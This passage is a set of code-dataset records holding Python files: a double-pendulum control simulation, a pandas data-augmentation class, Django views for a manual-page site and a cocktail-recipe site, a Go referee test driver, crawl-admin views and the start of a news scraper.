torquelim\n if(returnval[1] < -1*torquelim):\n returnval[1] = -1*torquelim\n if(x[0] > 0.22):\n #returnval[0] = 1000*(0.21 - x[0])\n #if(returnval[0] < -100):\n # returnval[0] = -100\n returnval[1] = 0\n if(x[0] < -0.22):\n #returnval[0] = -1000*(x[0] + 0.21) \n #if(returnval[0] > 100):\n # returnval[0] = 100\n returnval[1] = 0\n torque_vector.append(returnval)\n time_vector.append(t)\n if(t < 1.25 and t > 1):\n returnval[0] = -40\n tracking_vector.append([angle_1[idx], angle_2[idx]])\n curr_vector.append([x[0], x[1]])\n return returnval\n\ndef zero_controller(x,t):\n global lastidx\n global counter\n torquelim = 200\n if(counter == 0):\n lastidx = np.abs(angle_1 - x[0]).argmin()\n counter = counter + 1\n idx = lastidx\n returnval = -dot(K[lastidx],x)\n print(\"first round\")\n print(lastidx)\n if(x[2] < 0.2 and x[2] > -0.2):\n idx = (np.abs(angle_1 - x[0])).argmin()\n if((idx + 5) > 91):\n idx = idx - 4\n if((idx - 5) < 91):\n idx = idx + 4\n lastidx = idx\n returnval = -dot(K[idx], x)\n idx_vector.append(lastidx)\n print(idx)\n else:\n idx = lastidx\n idx_vector.append(lastidx)\n returnval = -dot(K[idx], x)\n tracking_vector.append([angle_1[idx], angle_2[idx]])\n curr_vector.append([x[0], x[1]])\n if(returnval[1] > torquelim):\n returnval[1] = torquelim\n if(returnval[1] < -1*torquelim):\n returnval[1] = -1*torquelim\n if(x[0] > 0.22):\n #returnval[0] = 1000*(0.21 - x[0])\n #if(returnval[0] < -100):\n # returnval[0] = -100\n returnval[1] = 0\n if(x[0] < -0.22):\n #returnval[0] = -1000*(x[0] + 0.21) \n #if(returnval[0] > 100):\n # returnval[0] = 100\n returnval[1] = 0\n if(t > 0.5 and t < 2.00):\n returnval[0] = 4\n returnval[1] = returnval[1] - 4\n# if(t > 1.0 and t < 1.15):\n# returnval[0] = 10\n# if(t > 1.3 and t < 1.45):\n# returnval[0] = 10\n# if(t > 1.7 and t < 1.85):\n# returnval[0] = 10\n\n torque_vector.append(returnval)\n time_vector.append(t)\n return returnval\n\ndef path_controller(x,t):\n global lastidx\n global counter\n torquelim = 200\n if(counter == 0):\n lastidx = np.abs(angle_1 - x[0]).argmin()\n counter = counter + 1\n returnval = -dot(K[lastidx], x)\n print(\"first round\")\n print(lastidx)\n if(x[2] < 0.5 and x[2] > -.5):\n if(lastidx > 0 and counter%50 ==0):\n lastidx = lastidx - 2\n print(\"i am slow\")\n print(lastidx)\n returnval = -dot(K[lastidx], x)\n idx_vector.append(lastidx)\n else:\n idx = (np.abs(angle_1 - x[0])).argmin()\n lastidx = idx\n idx_vector.append(lastidx)\n returnval = -dot(K[idx], x)\n print(idx)\n tracking_vector.append([angle_1[lastidx], angle_2[lastidx]])\n counter = counter + 1\n curr_vector.append([x[0], x[1]])\n if(returnval[1] > torquelim):\n returnval[1] = torquelim\n if(returnval[1] < -1*torquelim):\n returnval[1] = -1*torquelim\n if(x[0] > 0.22):\n #returnval[0] = 1000*(0.21 - x[0])\n #if(returnval[0] < -100):\n # returnval[0] = -100\n returnval[1] = 0\n if(x[0] < -0.22):\n #returnval[0] = -1000*(x[0] + 0.21) \n #if(returnval[0] > 100):\n # returnval[0] = 100\n returnval[1] = 0\n \n torque_vector.append(returnval)\n time_vector.append(t)\n return returnval\n\n\ndef lqr_controller(x,t):\n global lastk\n if(t==0):\n idx = np.abs(angle_1 - x[0]).argmin()\n print(idx)\n lastk = K[idx]\n returnval = -dot(lastk,x)\n #if(x[0] > 0.21):\n # returnval[0] = 1000*(0.21 - x[0])\n #if(x[0] < 0.21):\n # returnval[0] = -1000*(x[0]+0.21) \n returnval[0] = 500*(x0[0]-x[0])\n torque_vector.append(returnval)\n time_vector.append(t)\n return returnval\n \ndef pid_controller(x,t):\n diff = [x0[0] - x[0], x0[1] - x[1]]\n diff[1] = diff[1]+diff[0]\n diff[0]=0\n torque_vector.append(diff)\n time_vector.append(t)\n return -100*diff\n\ndef local_controller(x,t):\n idx = np.abs(angle_1 - x[0]).argmin()\n gainK = K[idx]\n returnval = -dot(gainK,x)\n if(returnval[1] > 300):\n returnval[1] = 300\n if(returnval[1] < -300):\n returnval[1] = -300\n torque_vector.append(returnval)\n time_vector.append(t)\n return returnval\ndef trim_controller(x,t):\n idx = np.abs(angle_1 - x[0]).argmin()\n return [0, torques[idx]]\n\n#args['specified'] = test_controller\n\ny = odeint(right_hand_side, x0, t, args=(args,))\n\nx1 = numerical_constants[0]*sin(y[:,0])\ny1 = numerical_constants[0]*cos(y[:,0])\n\nx2 = x1 + numerical_constants[4]*sin(y[:,0] + y[:,1])\ny2 = y1 + numerical_constants[4]*cos(y[:,0] + y[:,1])\n\np_energy_vector = []\nk_energy_vector = []\ntot_ke = []\ntot_pe = []\n\nfor i in y[:,:2]:\n coord_dict = dict(zip(coordinates, i))\n p_energy = (leg.potential_energy.subs(coord_dict).subs(parameter_dict), body.potential_energy.subs(coord_dict).subs(parameter_dict))\n p_energy_vector.append(p_energy)\n tot_pe.append(p_energy[0] + p_energy[1])\n\nfor p,s in zip(y[:,:2], y[:,2:]):\n speeds_dict = dict(zip(speeds,s))\n coords_dict = dict(zip(coordinates, p))\n tot_ke.append(ke_body.subs(speeds_dict).subs(coords_dict).subs(parameter_dict))\n\ntot_e = []\nfor i, j in zip(tot_ke, tot_pe):\n tot_e.append(i+j)\n\ndt = 0.05\n\nfig = plt.figure()\nax = fig.add_subplot(111, autoscale_on=False,aspect='equal', xlim = (-2, 2), ylim = (-2, 2))\nax.grid()\n\nline, = ax.plot([], [], 'o-', lw=2)\ntime_template = 'time=%.1fs'\ntime_text = ax.text(0.05, 0.9, '', transform=ax.transAxes)\n\ndef init():\n line.set_data([],[])\n time_text.set_text('')\n return line, time_text\n\ndef animate(i):\n thisx = [0, x1[i], x2[i]]\n thisy = [0, y1[i], y2[i]]\n\n line.set_data(thisx, thisy)\n time_text.set_text(time_template%(i*dt))\n return line, time_text\n\nani = animation.FuncAnimation(fig, animate, np.arange(1, len(y)), interval=25, blit=True, init_func=init)\nani.save('acrobot_zeroc_0_0_disturbance_initial_K.mp4')\nplt.show()\n\nf, (ax1, ax2, ax3) = plt.subplots(3)\n\nke1, ke2 = dynamicsymbols('ke1, ke2')\npe1, pe2 = dynamicsymbols('pe1, pe2')\nke, pe,tot = dynamicsymbols('ke, pe, tot')\n\nenergies = [pe1,pe2,ke1,ke2]\nenergy = [pe, ke, tot]\n\n\n\n\nax1.plot(t, rad2deg(y[:,:2]))\nax1.set_xlabel('Time [s]')\nax1.set_ylabel('Angle[deg]')\nax1.legend([\"${}$\".format(vlatex(c)) for c in coordinates])\n\"\"\"\nplot(time_vector, tracking_vector)\n#plot(time_vector, curr_vector)\nxlabel('Time')\nylabel('angle')\nplt.show()\n\nplot(time_vector, torque_vector)\nxlabel('Time [s]')\nylabel('Angle 1 torque')\nplt.show()\n\"\"\"\nax2.plot(t, rad2deg(y[:, 2:]))\nax2.set_xlabel('Time [s]')\nax2.set_ylabel('Angular Rate [deg/s]')\nax2.legend([\"${}$\".format(vlatex(s)) for s in speeds])\n\nax3.plot(t, tot_pe)\nax3.plot(t, tot_ke)\nax3.plot(t, tot_e)\nax3.set_xlabel('Time [s]')\nax3.set_ylabel('Energy')\nax3.legend([\"${}$\".format(vlatex(e)) for e in energy])\nplt.show()\n\"\"\"\nplot(time_vector, idx_vector)\nxlabel('t')\nylabel('idx')\nplt.show()\n\"\"\"\n","sub_path":"double_pendulum/double_pendulum_controlled_gain_scheduling.py","file_name":"double_pendulum_controlled_gain_scheduling.py","file_ext":"py","file_size_in_byte":9393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"81248919","text":"import math\n\nimport numpy as np\nimport pandas as pd\n\n\nclass PointShift:\n\n def __init__(self, local_variance: int):\n self.data = None\n self.local_variance = local_variance\n self.response_column = None\n\n def fit(self, X, response_column=None, **kwargs):\n self.data = X\n self.response_column = response_column\n return self\n\n def sample(self, size: int):\n assert size > self.data.shape[0]\n k = self.determine_k(size)\n result = self.generate_points(k)\n return result.sample(size)\n\n def fit_and_sample_with_labels(self, X: pd.DataFrame, y: np.ndarray):\n X = X.insert(0, \"y\", y, allow_duplicates=True)\n self.data = X\n\n def determine_k(self, sample_size):\n if sample_size < self.data.shape[0]:\n return 0\n return math.ceil(sample_size / self.data.shape[0])\n\n def generate_points(self, total_size: int):\n df = pd.DataFrame(data=None, columns=self.data.columns)\n for row_idx in range(self.data.shape[0]):\n df = df.append(self._shift(row_idx, self.data, self.response_column, self.local_variance, total_size))\n return df\n\n def _shift(self, row_idx: int, data: pd.DataFrame, response_column: str, local_variance: int, size):\n new_data = pd.DataFrame()\n for col_idx in range(data.shape[1]):\n value = data.iloc[row_idx, col_idx]\n if data.columns[col_idx] != response_column:\n new_data.insert(len(new_data.columns), data.columns[col_idx], np.random.normal(value, local_variance, size), True)\n else:\n new_data.insert(len(new_data.columns), response_column, np.repeat(a=value, repeats=size), True)\n return new_data\n\n def _conditional_copy(self, original_data: pd.DataFrame, deep_copy: bool):\n if deep_copy:\n return original_data.copy()\n return original_data\n","sub_path":"src/main/generators/PointShift.py","file_name":"PointShift.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"563515098","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.db.models import Count\nfrom django.contrib.postgres.search import TrigramSimilarity\n\nfrom .models import Package, ManPage, SymbolicLink, UpdateLog, SoelimError\nfrom .utils import reverse_man_url, paginate, extract_headings\n\ndef index(request):\n count_man_pages = ManPage.objects.count()\n count_symlinks = SymbolicLink.objects.count()\n count_all_pkgs = Package.objects.count()\n count_pkgs_with_mans = ManPage.objects.aggregate(Count(\"package_id\", distinct=True))[\"package_id__count\"]\n last_updates = UpdateLog.objects.order_by(\"-id\")[:5]\n context = {\n \"count_man_pages\": count_man_pages,\n \"count_symlinks\": count_symlinks,\n \"count_pkgs_with_mans\": count_pkgs_with_mans,\n \"count_pkgs_without_mans\": count_all_pkgs - count_pkgs_with_mans,\n \"last_updates\": last_updates,\n }\n return render(request, \"index.html\", context)\n\ndef simple_view(request, *, template_name):\n if template_name not in {\"about\", \"dev\"}:\n raise Http404()\n return render(request, \"{}.html\".format(template_name), {})\n\ndef listing(request, *, repo=None, pkgname=None):\n sorting = request.GET.get(\"sorting\", \"alphabetical\")\n lang = request.GET.get(\"lang\")\n section = request.GET.get(\"section\")\n\n if sorting == \"alphabetical\":\n sorting_columns = (\"name\", \"lang\", \"section\")\n elif sorting == \"-alphabetical\":\n sorting_columns = (\"-name\", \"-lang\", \"-section\")\n elif sorting == \"section\":\n sorting_columns = (\"section\", \"name\", \"lang\")\n elif sorting == \"-section\":\n sorting_columns = (\"-section\", \"-name\", \"-lang\")\n elif sorting == \"lang\":\n sorting_columns = (\"lang\", \"name\", \"section\")\n elif sorting == \"-lang\":\n sorting_columns = (\"-lang\", \"-name\", \"-section\")\n else:\n raise HttpResponse(\"Unknown sorting parameter: {}\".format(sorting), status=400)\n\n db_pkg = None\n man_pages = ManPage.objects.order_by( *sorting_columns )\n\n if pkgname:\n # check that such package exists\n if repo:\n query = Package.objects.filter(name=pkgname, repo=repo)\n else:\n query = Package.objects.filter(name=pkgname)\n if len(query) == 0:\n if repo:\n raise Http404(\"The package {} does not exist in the {} repository.\".format(pkgname, repo))\n else:\n raise Http404(\"The package {} does not exist in the database.\".format(pkgname))\n elif len(query) == 1:\n db_pkg = query[0]\n else:\n raise HttpResponse(\n \"The package {} exists in multiple repositories ({}) and ambiguous listings are not implemented.\"\n .format(pkgname, \", \".join(pkg.repo for pkg in query)),\n status=501)\n man_pages = man_pages.filter(package__name=pkgname)\n if lang:\n man_pages = man_pages.filter(lang=lang)\n if section:\n man_pages = man_pages.filter(section=section)\n\n # list of symbolic links in a package\n if pkgname:\n symlinks_sorting_columns = []\n for c in sorting_columns:\n if \"name\" in c:\n c = c.replace(\"name\", \"from_name\")\n elif \"section\" in c:\n c = c.replace(\"section\", \"from_section\")\n symlinks_sorting_columns.append(c)\n symlinks = SymbolicLink.objects.order_by( *symlinks_sorting_columns ).filter(package__name=pkgname)\n symlinks_count = SymbolicLink.objects.filter(package__name=pkgname).count()\n else:\n symlinks = []\n symlinks_count = 0\n\n # template rendering time is dominated by the number of links, symlinks have 2 links per row\n if symlinks_count > 125:\n man_pages = paginate(request, \"page\", man_pages, 250)\n symlinks = paginate(request, \"page_symlinks\", symlinks, 125)\n else:\n man_pages = paginate(request, \"page\", man_pages, 500)\n symlinks = paginate(request, \"page_symlinks\", symlinks, 500)\n\n context = {\n \"url_repo\": repo,\n \"url_pkgname\": pkgname,\n \"pkg\": db_pkg,\n \"man_pages\": man_pages,\n \"symlinks\": symlinks,\n }\n return render(request, \"listing.html\", context)\n\ndef _get_package_filter(repo, pkgname):\n if repo is None and pkgname is None:\n return {}\n elif repo is None:\n return {\"package__name\": pkgname}\n else:\n return {\"package__name\": pkgname, \"package__repo\": repo}\n\n# Maybe all these checks should include repo/pkgname when specified in the URL,\n# but this seems enough to parse the URL correctly. debiman actually only checks\n# if given section/lang is in some static set.\ndef _exists_name_section(name, section):\n return ManPage.objects.filter(name=name, section=section).exists() or \\\n SymbolicLink.objects.filter(from_name=name, from_section=section).exists()\n\ndef _exists_language(lang):\n # cross-language symlinks are not allowed\n return ManPage.objects.filter(lang=lang).exists()\n\ndef _exists_name_language(name, lang):\n # cross-language symlinks are not allowed\n return ManPage.objects.filter(name=name, lang=lang).exists()\n\ndef _exists_name_section_language(name, section, lang):\n return ManPage.objects.filter(name=name, section=section, lang=lang).exists() or \\\n SymbolicLink.objects.filter(from_name=name, from_section=section, lang=lang).exists()\n\ndef _parse_man_name_section_lang(url_snippet, *, force_lang=None):\n # Man page names can contain dots, so we need to parse from the right. There are still\n # some ambiguities for shortcuts like gimp-2.8 (shortcut for gimp-2.8(1)), jclient.pl\n # (shortcut for jclient.pl.1.en) etc., but we'll either detect that the page given by\n # the greedy algorithm does not exist or the user can specify the section or language\n # to get the version they want.\n # NOTE: The force_lang parameter can be used to ignore the lang specified in the URL.\n # This is useful for redirections to the default language if we find out that there\n # is no version of the page in the user-specified language.\n parts = url_snippet.split(\".\")\n if len(parts) == 1:\n # name\n return url_snippet, None, None\n name = \".\".join(parts[:-1])\n # the last part can be a section or a language\n if _exists_name_section(name, parts[-1]):\n # any.name.section: language cannot come before section, so we're done\n return name, parts[-1], None\n elif len(parts) == 2:\n if force_lang is not None and not _exists_language(parts[-1]):\n # we still need to validate the input\n return url_snippet, None, None\n if _exists_name_language(name, force_lang or parts[-1]):\n # name.lang\n return name, None, force_lang or parts[-1]\n else:\n # dotted.name\n return url_snippet, None, None\n elif _exists_language(parts[-1]):\n name2 = \".\".join(parts[:-2])\n if _exists_name_section_language(name2, parts[-2], force_lang or parts[-1]):\n # name.section.lang\n return name2, parts[-2], force_lang or parts[-1]\n if _exists_name_language(name, force_lang or parts[-1]):\n # name.with.dots.lang\n return name, None, force_lang or parts[-1]\n # name.with.dots\n return url_snippet, None, None\n else:\n # name.with.dots\n return url_snippet, None, None\n\ndef try_redirect_or_404(request, repo, pkgname, man_name, man_section, lang, output_type, name_section_lang):\n if man_section is None:\n query = SymbolicLink.objects.filter(from_name=man_name, lang=lang, **_get_package_filter(repo, pkgname))\n # TODO: we're trying to guess the newest version, but lexical ordering is too weak\n query = query.order_by(\"from_section\", \"-package__version\")[:1]\n else:\n query = SymbolicLink.objects.filter(from_section=man_section, from_name=man_name, lang=lang, **_get_package_filter(repo, pkgname))\n # TODO: we're trying to guess the newest version, but lexical ordering is too weak\n query = query.order_by(\"-package__version\")[:1]\n\n if len(query) > 0:\n symlink = query[0]\n # repo and pkgname are not added, the target might be in a different package\n url = reverse_man_url(\"\", \"\", symlink.to_name, symlink.to_section, symlink.lang, output_type)\n return HttpResponseRedirect(url)\n\n # Try the default language before giving 404.\n # This is important because we don't know if the user explicitly specified\n # the language or followed a link to a localized page, which does not exist.\n # TODO: we could parse the referer header and redirect only links coming from this site\n #\n # Note: if page \"foo\" does not exist in language \"bar\", we'll get \"foo.bar\" as the\n # man_name, so we need to re-parse the URL and force the default language.\n parsed_name, parsed_section, parsed_lang = _parse_man_name_section_lang(name_section_lang, force_lang=\"en\")\n if (parsed_name != man_name or parsed_section != man_section) and parsed_lang == \"en\":\n url = reverse_man_url(repo, pkgname, parsed_name, parsed_section, \"en\", output_type)\n return HttpResponseRedirect(url)\n # otherwise page does not exist in en -> 404\n\n man_page = man_name\n if man_section:\n man_page += \".\" + man_section\n\n if repo and pkgname:\n raise Http404(\"No manual entry for {} found in package {}/{}.\".format(man_page, repo, pkgname))\n elif pkgname:\n raise Http404(\"No manual entry for {} found in package {}.\".format(man_page, pkgname))\n else:\n raise Http404(\"No manual entry for {} found in any package.\".format(man_page))\n\ndef man_page(request, *, repo=None, pkgname=None, name_section_lang=None, url_output_type=None):\n # validate input parameters\n if repo is not None and pkgname is None:\n return HttpResponse(\"Specifying repo ({}) without a pkg name should not be allowed.\".format(repo), status=500)\n if not name_section_lang:\n return HttpResponse(\"The name of the man page was not specified.\", status=400)\n assert \"/\" not in name_section_lang\n man_name, man_section, url_lang = _parse_man_name_section_lang(name_section_lang)\n lang = url_lang or \"en\"\n serve_output_type = url_output_type or \"html\"\n if serve_output_type not in {\"html\", \"txt\", \"raw\"}:\n return HttpResponse(\"Serving of {} content type is not implemented yet.\".format(serve_output_type), status=501)\n\n # find the man page and package containing it\n if man_section is None:\n query = ManPage.objects.filter(name=man_name, lang=lang, **_get_package_filter(repo, pkgname))\n # TODO: we're trying to guess the newest version, but lexical ordering is too weak\n query = query.order_by(\"section\", \"-package__version\")[:1]\n else:\n query = ManPage.objects.filter(section=man_section, name=man_name, lang=lang, **_get_package_filter(repo, pkgname))\n # TODO: we're trying to guess the newest version, but lexical ordering is too weak\n query = query.order_by(\"-package__version\")[:1]\n\n if len(query) == 0:\n return try_redirect_or_404(request, repo, pkgname, man_name, man_section, lang, url_output_type, name_section_lang)\n else:\n db_man = query[0]\n if man_section is None:\n return HttpResponseRedirect(reverse_man_url(repo, pkgname, man_name, db_man.section, url_lang, url_output_type))\n db_pkg = db_man.package\n\n if serve_output_type == \"raw\":\n return HttpResponse(db_man.content.raw, content_type=\"text/plain; charset=utf8\")\n\n try:\n converted_content = db_man.get_converted(serve_output_type)\n except SoelimError:\n raise Http404(\"The requested manual contains a .so reference to an unknown file.\")\n\n if serve_output_type == \"txt\":\n return HttpResponse(converted_content, content_type=\"text/plain; charset=utf8\")\n\n # links to other packages providing the same manual\n other_packages = []\n query = ManPage.objects.values(\"package__repo\", \"package__name\") \\\n .filter(section=db_man.section, name=man_name, lang=lang) \\\n .exclude(package__id=db_pkg.id) \\\n .union(SymbolicLink.objects.values(\"package__repo\", \"package__name\") \\\n .filter(from_section=db_man.section, from_name=man_name, lang=lang) \\\n .exclude(package__id=db_pkg.id)) \\\n .order_by(\"package__repo\", \"package__name\")\n for row in query:\n info = {\n \"repo\": row[\"package__repo\"],\n \"name\": row[\"package__name\"],\n }\n other_packages.append(info)\n\n # links to other languages - might lead to different package, even if the user specified repo or pkgname\n other_languages = set()\n query = ManPage.objects.values(\"lang\") \\\n .filter(section=db_man.section, name=man_name) \\\n .exclude(lang=lang) \\\n .union(SymbolicLink.objects.values(\"lang\") \\\n .filter(from_section=db_man.section, from_name=man_name) \\\n .exclude(lang=lang))\n for row in query:\n other_languages.add(row[\"lang\"])\n\n # links to other sections - might lead to different package, even if the user specified repo or pkgname\n other_sections = set()\n query = ManPage.objects.values(\"section\") \\\n .filter(name=man_name, lang=lang) \\\n .exclude(section=db_man.section) \\\n .union(SymbolicLink.objects.values(\"from_section\") \\\n .filter(from_name=man_name, lang=lang) \\\n .exclude(from_section=db_man.section))\n for row in query:\n other_sections.add(row[\"section\"])\n\n # this is pretty fast, no caching\n headings = extract_headings(converted_content)\n\n context = {\n \"lang\": lang, # used in base.html\n \"url_repo\": repo,\n \"url_pkgname\": pkgname,\n \"url_lang\": url_lang,\n \"url_output_type\": url_output_type,\n \"pkg\": db_pkg,\n \"man\": db_man,\n \"man_page_content\": converted_content,\n \"headings\": headings,\n \"other_packages\": other_packages,\n \"other_languages\": sorted(other_languages),\n \"other_sections\": sorted(other_sections),\n }\n\n return render(request, \"man_page.html\", context)\n\n# references:\n# https://www.postgresql.org/docs/current/static/pgtrgm.html\n# https://www.postgresql.org/docs/current/static/textsearch.html\n# https://docs.djangoproject.com/en/1.11/ref/contrib/postgres/search/\ndef search(request):\n term = request.GET[\"q\"]\n\n man_filter = {}\n\n if \"lang\" in request.GET:\n man_filter[\"lang__iexact\"] = request.GET[\"lang\"]\n\n man_results = ManPage.objects.values(\"name\", \"section\", \"lang\", \"package__repo\", \"package__name\") \\\n .filter(name__trigram_similar=term, **man_filter) \\\n .annotate(similarity=TrigramSimilarity(\"name\", term)) \\\n .union(SymbolicLink.objects.values(\"from_name\", \"from_section\", \"lang\", \"package__repo\", \"package__name\")\n .filter(from_name__trigram_similar=term, **man_filter)\n .annotate(similarity=TrigramSimilarity(\"from_name\", term)),\n all=True) \\\n .order_by(\"-similarity\", \"name\", \"section\", \"lang\")\n man_results = paginate(request, \"page_man\", man_results, 20)\n\n# pkg_results = Package.objects.values(\"repo\", \"name\", \"description\") \\\n# .filter(name__trigram_similar=term) \\\n# .annotate(similarity=TrigramSimilarity(\"name\", term)) \\\n# .order_by(\"-similarity\", \"name\", \"repo\")\n pkg_results = Package.objects.only(\"repo\", \"name\").extra(\n select={\n \"desc_snippet\": \"ts_headline('english', description, plainto_tsquery(%s))\",\n \"rank\": \"similarity(name, %s) + 2 * ts_rank(to_tsvector('english', description), plainto_tsquery(%s), 32)\",\n },\n where=[\"name %% %s OR to_tsvector('english', description) @@ plainto_tsquery(%s)\"],\n params=[term, term],\n select_params=[term, term, term],\n order_by=('-rank', ),\n )\n pkg_results = paginate(request, \"page_pkg\", pkg_results, 20)\n\n context = {\n \"man_results\": man_results,\n \"pkg_results\": pkg_results,\n }\n\n return render(request, \"search.html\", context)\n","sub_path":"archweb_manpages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"259556649","text":"import json\nimport sys\nfrom go_referee import GoReferee\n\ncommand_list = []\ndecoder = json.JSONDecoder()\n\nif not sys.stdin.isatty():\n file = sys.stdin.read()\n s_len = len(file)\n end = 0\n\n while end != s_len:\n try:\n obj, end = decoder.raw_decode(file, idx=end)\n command_list.append(obj)\n except ValueError:\n end += 1\n\nresult_list = []\n\n# print(command_list)\n\nReferee = GoReferee()\nnames = 0\n\nfor command in command_list:\n if names != 2:\n output = Referee.assign_player(command)\n names += 1\n if output:\n # print(output)\n result_list += output\n else:\n # actions here, return board history before every action\n result_list.append(Referee.get_history())\n # print(Referee.get_history())\n output = Referee.perform_action(command)\n if output:\n # print(output)\n # someone won\n result_list.append(output)\n break\n\n# print('end here')\n# print(Referee.history[0].get_board_repr())\n\n\nprint(json.dumps(result_list))","sub_path":"Desktop/python_go_complete_game/go_complete_game_python/Deliverables copy/6/6.2/test_driver.py","file_name":"test_driver.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"536718144","text":"# Create your views here.\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseNotFound\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.template import RequestContext\nfrom django.contrib.auth.models import User\nimport elesma.models\nimport settings\nfrom djangoratings.models import Vote\nfrom django.contrib.auth.decorators import login_required\nfrom django.forms import ModelForm, CheckboxSelectMultiple, ModelMultipleChoiceField\nfrom uni_form.helpers import FormHelper, Submit, Reset, Layout, Fieldset, Row, HTML\nfrom django.template.defaultfilters import slugify\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\ndef user(request, username=None):\n user = get_object_or_404(User, username=username)\n votes = Vote.objects.filter(user=user)\n return render_to_response('elesma/profile.html',\n { 'object': user,\n 'votes': votes,\n },\n context_instance=RequestContext(request))\n\nclass RecipeForm(ModelForm):\n ingredients = ModelMultipleChoiceField(queryset=elesma.models.Ingredient.objects.all().order_by('name'),\n required=True,\n widget=CheckboxSelectMultiple)\n\n class Meta:\n model = elesma.models.Recipe\n fields = ('name', 'description', 'directions', 'category', 'container', 'ingredients')\n\n helper = FormHelper()\n layout = Layout(Fieldset('Describe your Drink','name', 'category', 'container', 'description'),\n Fieldset('Record the Recipe', 'directions','ingredients'),\n )\n helper.add_layout(layout)\n helper.add_input(Submit('create', 'Create Cocktail'))\n\n@login_required\ndef create_recipe(request):\n if request.method == 'POST':\n formset = RecipeForm(request.POST, request.FILES)\n if formset.is_valid():\n recipe = formset.save(commit=False)\n recipe.slug = slugify(recipe.name)\n try:\n recipe.save()\n finally:\n return HttpResponseRedirect(reverse('elesma.views.recipe', kwargs={'slug': recipe.slug}))\n else:\n formset = RecipeForm()\n return render_to_response('elesma/create_recipe.html',\n { 'form': formset,\n },\n context_instance=RequestContext(request))\n\ndef recipe(request, slug):\n recipe = get_object_or_404(elesma.models.Recipe, slug=slug)\n vote = recipe.rating.get_rating_for_user(request.user, request.META['REMOTE_ADDR'])\n recent_votes = recipe.rating.get_ratings()[0:3]\n setattr(recipe.rating, 'score', int(recipe.rating.get_rating()))\n return render_to_response('elesma/recipe.html',\n { 'object': recipe,\n 'vote': vote,\n 'recent_votes': recent_votes,\n },\n context_instance=RequestContext(request))\n\ndef random_drink(request):\n recipe = elesma.models.Recipe.objects.all().order_by('?')[0]\n return HttpResponseRedirect(reverse('elesma.views.recipe', kwargs={'slug': recipe.slug}))\n\ndef ingredient(request):\n # @TODO: handle more than one ingredient\n for ingredient_name in request.GET.getlist('ingredient'):\n ingredient = get_object_or_404(elesma.models.Ingredient, name__iexact=ingredient_name)\n recipes = ingredient.recipe_set.all()\n return render_to_response('elesma/ingredients.html',\n { 'objects': [ingredient],\n 'recipes': recipes,\n },\n context_instance=RequestContext(request))\n return HttpResponseNotFound()\n\n\n\n\ndef user_leaderboard(request):\n profiles = elesma.models.UserProfile.objects.all().order_by('-votes')[:10]\n return render_to_response('elesma/user_leaderboard.html',\n { 'objects': profiles },\n context_instance=RequestContext(request))\n\ndef recipe_leaderboard(request):\n qs = elesma.models.Recipe.objects.extra(select={\n 'rating_rank': '((100/%s*rating_score/(rating_votes+%s))+100)/2' % (elesma.models.Recipe.rating.range,\n elesma.models.Recipe.rating.weight+1)\n })\n qs = qs.order_by('-rating_rank')[:10]\n return render_to_response('elesma/recipe_leaderboard.html',\n { 'objects': qs },\n context_instance=RequestContext(request))\n\ndef random_drink_404(request):\n cocktail = elesma.models.Recipe(name=\"404 Cocktail\",\n directions=\"Carefully check the URL you intended to discover, mix in the ingredients, and go.\",\n category=elesma.models.Category(name=\"When-You-Typo Cocktail\"),\n container=elesma.models.Container(name=request.META.get('HTTP_USER_AGENT', 'Your Browser')),\n )\n resp = render_to_response('404.html',\n {'object': cocktail },\n context_instance=RequestContext(request))\n resp.status_code = 404\n return resp\n","sub_path":"elesma_project/apps/elesma/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"106660631","text":"from django.views.generic.base import TemplateView\nfrom django.views.generic.edit import FormView\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.cache import cache\nfrom .forms import CrawlForm\nfrom celery.result import AsyncResult\nimport json\n\n\nSESSION_EXPIRE_TIME = 30\n\n\nclass AdminView(FormView):\n template_name = 'dsp_index/admin_page.html'\n form_class = CrawlForm\n success_url = '/admin/'\n\n def form_valid(self, form):\n \"\"\"This method is called when valid form data has been POSTed.\"\"\"\n # Crawl documents\n crawl_task = form.crawl()\n # Set session\n self.request.session.set_expiry(SESSION_EXPIRE_TIME)\n self.request.session['crawl_task_id'] = crawl_task.id\n\n return super(AdminView, self).form_valid(form)\n\n\nclass LoginView(TemplateView):\n template_name = 'dsp_index/login_page.html'\n\n\ndef poll_task_state(request):\n if request.is_ajax():\n if 'task_id' in request.POST.keys() and request.POST['task_id']:\n task_id = request.POST['task_id']\n task = AsyncResult(task_id)\n data = {'state': task.state, 'result': task.result}\n else:\n data = 'No task_id in the request.'\n else:\n data = 'This is not an ajax request.'\n\n json_data = json.dumps(data)\n return HttpResponse(json_data, content_type='application/json')\n\n\ndef get_last_crawl(request):\n if request.method == 'GET':\n data = cache.get('last_crawl_time'), cache.get('last_crawl_tid')\n if data is None:\n data = 'No crawl history found'\n else:\n data = 'This is not a GET request.'\n json_data = json.dumps(data)\n return HttpResponse(json_data, content_type='application/json')\n","sub_path":"dsp_index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"339764526","text":"from pprint import pprint\n\nimport requests\nimport json\nfrom numpy.lib.recfunctions import recursive_fill_fields\nfrom bs4 import BeautifulSoup\n\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n\n try:\n import unicodedata\n unicodedata.numeric(s)\n return True\n except (TypeError, ValueError):\n pass\n\n return False\n\n\nclass Scrape:\n site = 'http://www.spiegel.de'\n json = []\n\n def extract_information_to_json(self):\n for teaser_article in self.teaser_content():\n author = teaser_article.find_next('span', {'class': 'author'}).string\n title = 